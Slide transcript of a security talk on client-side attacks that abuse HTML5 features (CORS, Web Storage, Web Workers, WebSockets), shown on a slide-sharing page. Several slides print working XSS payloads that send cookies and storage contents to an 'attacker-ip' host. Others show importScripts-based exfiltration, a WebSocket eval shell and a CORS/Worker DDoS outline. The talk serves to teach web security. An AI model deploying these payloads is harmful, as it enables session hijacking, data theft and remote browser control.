Conviso Application Security
 
Abotoaduras & Bonés
Abotoaduras & BonésAbotoaduras & Bonés
Abotoaduras & Bonés
Conviso Application Security
 
Tratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com phpTratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com php
Conviso Application Security
 

More from Conviso Application Security (20)

Entendendo o PCI-DSS
Entendendo o PCI-DSSEntendendo o PCI-DSS
Entendendo o PCI-DSS
 
Integrando testes de segurança ao processo de desenvolvimento de software
Integrando testes de segurança ao processo de desenvolvimento de softwareIntegrando testes de segurança ao processo de desenvolvimento de software
Integrando testes de segurança ao processo de desenvolvimento de software
 
Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações?
Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações? Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações?
Uma verdade inconveniente - Quem é responsável pela INsegurança das aplicações?
 
“Web Spiders” – Automação para Web Hacking
“Web Spiders” – Automação para Web Hacking“Web Spiders” – Automação para Web Hacking
“Web Spiders” – Automação para Web Hacking
 
Você Escreve Código e Quem Valida?
Você Escreve Código e Quem Valida?Você Escreve Código e Quem Valida?
Você Escreve Código e Quem Valida?
 
Testar não é suficiente. Tem que fazer direito!
Testar não é suficiente. Tem que fazer direito!Testar não é suficiente. Tem que fazer direito!
Testar não é suficiente. Tem que fazer direito!
 
Implementando Segurança em desenvolvimento com a verdadeira ISO
Implementando Segurança em desenvolvimento com a verdadeira ISOImplementando Segurança em desenvolvimento com a verdadeira ISO
Implementando Segurança em desenvolvimento com a verdadeira ISO
 
Automatizando a análise passiva de aplicações Web
Automatizando a análise passiva de aplicações WebAutomatizando a análise passiva de aplicações Web
Automatizando a análise passiva de aplicações Web
 
Você confia nas suas aplicações mobile?
Você confia nas suas aplicações mobile?Você confia nas suas aplicações mobile?
Você confia nas suas aplicações mobile?
 
Pentest em Aplicações Móveis
Pentest em Aplicações MóveisPentest em Aplicações Móveis
Pentest em Aplicações Móveis
 
MASP: Um processo racional para garantir o nível de proteção das aplicações w...
MASP: Um processo racional para garantir o nível de proteção das aplicações w...MASP: Um processo racional para garantir o nível de proteção das aplicações w...
MASP: Um processo racional para garantir o nível de proteção das aplicações w...
 
HTML5 Seguro ou Inseguro?
HTML5 Seguro ou Inseguro?HTML5 Seguro ou Inseguro?
HTML5 Seguro ou Inseguro?
 
Threats from economical improvement rss 2010
Threats from economical improvement rss 2010Threats from economical improvement rss 2010
Threats from economical improvement rss 2010
 
O processo de segurança em desenvolvimento, que não é ISO 15.408
O processo de segurança em desenvolvimento, que não é ISO 15.408O processo de segurança em desenvolvimento, que não é ISO 15.408
O processo de segurança em desenvolvimento, que não é ISO 15.408
 
Encontrando falhas em aplicações web baseadas em flash
Encontrando falhas em aplicações web baseadas em flashEncontrando falhas em aplicações web baseadas em flash
Encontrando falhas em aplicações web baseadas em flash
 
Protegendo Aplicações Php com PHPIDS - Php Conference 2009
Protegendo Aplicações Php com PHPIDS - Php Conference 2009Protegendo Aplicações Php com PHPIDS - Php Conference 2009
Protegendo Aplicações Php com PHPIDS - Php Conference 2009
 
Playing Web Fuzzing - H2HC 2009
Playing Web Fuzzing - H2HC 2009Playing Web Fuzzing - H2HC 2009
Playing Web Fuzzing - H2HC 2009
 
OWASP Top 10 e aplicações .Net - Tech-Ed 2007
OWASP Top 10 e aplicações .Net - Tech-Ed 2007OWASP Top 10 e aplicações .Net - Tech-Ed 2007
OWASP Top 10 e aplicações .Net - Tech-Ed 2007
 
Abotoaduras & Bonés
Abotoaduras & BonésAbotoaduras & Bonés
Abotoaduras & Bonés
 
Tratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com phpTratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com php
 

Recently uploaded

Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17
Bhajan Mehta
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
ldtexsolbl
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
Ivanti
 
Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3
DianaGray10
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
shanihomely
 
Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
Google Developer Group - Harare
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
DianaGray10
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
ankush9927
 
Semantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software DevelopmentSemantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software Development
Baishakhi Ray
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
bellared2
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
BrainSell Technologies
 
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Nicolás Lopéz
 
Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
Matthias Neugebauer
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
Enterprise Knowledge
 
Generative AI Reasoning Tech Talk - July 2024
Generative AI Reasoning Tech Talk - July 2024Generative AI Reasoning Tech Talk - July 2024
Generative AI Reasoning Tech Talk - July 2024
siddu769252
 
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
FIDO Alliance
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
sunilverma7884
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
Jimmy Lai
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
Priyanka Aash
 
Uncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in LibrariesUncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in Libraries
Brian Pichman
 

Recently uploaded (20)

Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17Mule Experience Hub and Release Channel with Java 17
Mule Experience Hub and Release Channel with Java 17
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
 
Patch Tuesday de julio
Patch Tuesday de julioPatch Tuesday de julio
Patch Tuesday de julio
 
Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3Communications Mining Series - Zero to Hero - Session 3
Communications Mining Series - Zero to Hero - Session 3
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
 
Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
 
Semantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software DevelopmentSemantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software Development
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
 
Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024Vertex AI Agent Builder - GDG Alicante - Julio 2024
Vertex AI Agent Builder - GDG Alicante - Julio 2024
 
Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
 
Generative AI Reasoning Tech Talk - July 2024
Generative AI Reasoning Tech Talk - July 2024Generative AI Reasoning Tech Talk - July 2024
Generative AI Reasoning Tech Talk - July 2024
 
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
UX Webinar Series: Drive Revenue and Decrease Costs with Passkeys for Consume...
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
 
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python CodebaseEuroPython 2024 - Streamlining Testing in a Large Python Codebase
EuroPython 2024 - Streamlining Testing in a Large Python Codebase
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
 
Uncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in LibrariesUncharted Together- Navigating AI's New Frontiers in Libraries
Uncharted Together- Navigating AI's New Frontiers in Libraries
 

Building Client-Side Attacks with HTML5 Features

  • 1. Building Client-Side Attacks with <HTML5> features Tiago Ferreira tiago.ccna@gmail.com
  • 3. ABOUT ME • Almost 4 years working with IT network devices and 5 years with security (MSS, Pentest, VA, etc). • Focus on Web Application vulnerabilities exploitation. • Security analyst at CONVISO Application Security. • Member of the research group Alligator Security Team.
  • 4. A few words about Same Origin Policy • Perhaps the most important security concept within modern browsers. • The policy permits scripts running on pages originating from the same site to access each other‘s. • Prevents access to most methods and properties across pages on different sites. • An origin is defined by the protocol, host/domain, and port of a URL: o http://www.example.com/dir/page.html o https://www.example.com/dir/page2.html o http://www.example.com:8080/dir/page.html o http://en.example.com/dir/other.html • In practice, there is no single same-origin policy: o DOM access, XMLHttpRequest, Cookies, Flash, Java. Silverlight, etc
  • 5. HTML5 Overview • The Hypertext Markup Language version 5 (HTML5) is the successor of HTML 4.01, XHTML 1.0 and XHTML 1.1. • It brings several new technologies to the browser which have never been, such as: o New DOM interfaces o New forms elements o Enhanced XHR (Level 2) o Web Storage o Web Socket o Web Workers o File API o Many new attributes • HTML5 provides new features to web applications but also introduces new security issues.
  • 6. CORS - (Cross-Origin Resource Sharing)
  • 7. CORS • CORS is a web browser technology that enables client-side API to make cross-origin requests to external resources. • New HTTP header is defined "Access-Control-Allow-Origin" . HTTP/1.1 200 OK Server: Apache Content-Type: text/html Access-Control-Allow-Origin: http://example.com/ • First the UA makes the request to the foreign domain and then checks the access control based on the returned Access-Control- Allow-Origin header. • The decision whether the API (XMLHttpRequest) is allowed to access foreing domains is made in UA.
  • 8. CORS • Potential threats o Information gathering - Response time based intranet scanning o Universal Allow - Bypass access control o Remote attacking a web server - UA can be used to attack another web server o DDoS attacks combined with Web Workers
  • 10. Web Storage • Web Storage gives websites the possibility to store data on the user's browser. The information can be accessed later using JavaScript. • Web storage offers two different storage areas: o Local Storage o Session Storage • Web storage provides far greater storage capacity (depends on browser between 5MB to 10MB). • It is supported by: Internet Explorer 8, Mozilla-based browsers (e.g., Firefox 2+, officially from 3.5), Safari 4, Google Chrome 4 (sessionStorage is from 5), Opera 10.50.
  • 11. localStorage • Data placed in local storage is per domain and persists after the browser is closed. • To store value on the browser: o localStorage.setItem(key, value); • To read value stored on the browser; o localStorage.getItem(key); • Security considerations: o Sensitive data can be stolen; o Data can be spoofed; o Persistent attack vectors.
  • 12. sessionStorage • Session storage is per-page-per-window and is limited to the lifetime of the window. • Store value on the browser: o sessionStorage.setItem('key', 'value'); • Read value stored on the browser: o sessionStorage.getItem(key); • Security considerations: o There’s no ‘path’ atribute; o There’s no ‘httpOnly’ atribute; o Session hijacking (xss, session fixation).
  • 13. Attack: Session hijacking using XSS • Old XSS payload to get cookies var a=new Image(); a.src=“http://attacker-ip/cookie=“ + document.cookie; • New XSS payload var a=new Image(); a.src=“http://attacker-ip/cookie=“+ sessionStorage.getItem(‘SessionID’);
  • 14. Attack: Session hijacking using XSS DEMO <script> for(var i = 0; i < sessionStorage.length; i++){ var key = sessionStorage.key(i); var a = new Image(); a.src="http://attacker-ip/Storage.html?key=" + key + "&value=" + sessionStorage.getItem(key); } </script>
  • 15. Attack: Stealing HTML5 localStorage DEMO <script> for(var i = 0; i < localStorage.length; i++){ var key = localStorage.key(i); var a = new Image(); a.src="http://attacker-ip/Storage.html?key=" + key + “ &value=" + localStorage.getItem(key); } </script>
  • 17. Web workers • API for spawning background scripts in web application via JavaScript. o Real OS-level threads and concurrency. o Managed communication through posting messages to background worker. • Web Workers run in an isolated thread. • Workers do NOT have access to: DOM, window, document, and parent objects. • Security validation based in same-origin principle.
  • 18. Spawning a worker http://owasp.org/index.html <script> var worker = new Worker("worker.js"); a worker.onmessage = function(event){ http://owasp.org/worker.js document.getElementById('response„).t self.onmessage = function(event){ extContet = event.data self.postMessage('Hello World'); }; }; worker.postMessage(); </script> … <pre id=“response” value=“ “>
  • 19. Workers – Available features • The location object (read-only). • The navigator object • setTimeout()/clearTimeout() and setInterval()/clearInterval(). • Spawning other web workers. • postMessage() o send data to worker (strings, JSON object, etc). • Event support (addEventListener, dispatchEvent, removeEventLlistener). • importScripts o importScript(‘http://external.com/script.js’). • XMLHttpRequests.
  • 20. Sending data to worker http://owasp.org/index.html <script> var worker = new Worker("worker.js"); http://owasp.org/worker.js worker.onmessage = function(event){ self.onmessage = function(event){ self.postMessage(event); document.getElementById('respo nse„).textContet = event.data; }; }; worker.postMessage(„Hello OWASP Floripa`); </script>
  • 21. Attack: Bypass SOP with importScripts() • Workers makes a natural sandbox for running untrusted code. • Workers can’t access page content. • ImportScripts() permits run thirdy party code in your domain. http://owasp.org/teste.js var sandbox=new Worker(„sandbox.js‟) sandbox.postMessage(„http://external.sit http://owasp.org/sandbox.js e/badguy.js‟); onmessage=function(e){ importScripts(e.data); postMessage(this[„someUnt rustedFunction‟]()); }
  • 22. Attack: Bypass SOP with importScripts() • But workers can run XMLHttpRequests DEMO o Script is running in the domain of the parent page. (http:/owasp.org/teste.js). o Can read any content on your domain. http://external.site/badguy.js var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://owasp.org/index.html', true); xhr.send(); xhr.onreadystatechange = function(remote_data){ if (remote_data.target.readyState == 4){ var remote_data = remote_data.target.responseText; importScripts('http://external.site/remote-page-content=' + remote_data); }; };
  • 23. Attack: DDoS with CORS and Web Workers • Start a WebWorker that would fire multiple Cross Origin Requests at the target. • Thanks CORS that can send GET/POST requests to any website. • Sending a cross domain GET request is nothing new (IMG tag or SCRIPT). • So simply by getting someone to visit a URL you can get them to send 10,000 HTTP requests/minute. • Can be spread with social engineering techniques (malicious URL, XSS vulnerabilities).
  • 24. Attack: DDoS with CORS and Web Workers Target Web Site XSS victims Vulnerable XSS web site DEMO Attacker injects XSS payload
  • 26. Web Sockets • Web Sockets is a web technology that provides bi-directional, full-duplex communications channels over a single TCP connection. • The connection is established by upgrading from the HTTP to the Web Socket protocol. • Web servers are now able to send content to the browser without being solicited by the client, wich allows messages to be passed back and forth while keeping the connection open. • URI Scheme: ws:// and wss:// • Threats that can be exploited: o Remote Shell, Web-Based Botnet, Port scanning
  • 28. Web Sockets – XSS Shell DEMO <script> var connection = new WebSocket('ws://attacker-ip:port'); connection.onopen = function (){ connection.send(„null‟); }; connection.onmessage = function(event){ eval(event.data); }; </script>
  • 29. References • The Websocket Protocol (http://tools.ietf.org/html/rfc6455) • Web Workers (http://www.w3.org/TR/workers/) • Web Storage (http://www.w3.org/TR/webstorage/) • Attack & Defense Labs (http://blog.andlabs.org/) • HTML5 Rocks (http://www.html5rocks.com/). • HTML5 Web Security - Michael Schmidt • The World According to KOTO (http://blog.kotowicz.net/) • Shreeraj's security blog (http://shreeraj.blogspot.in/)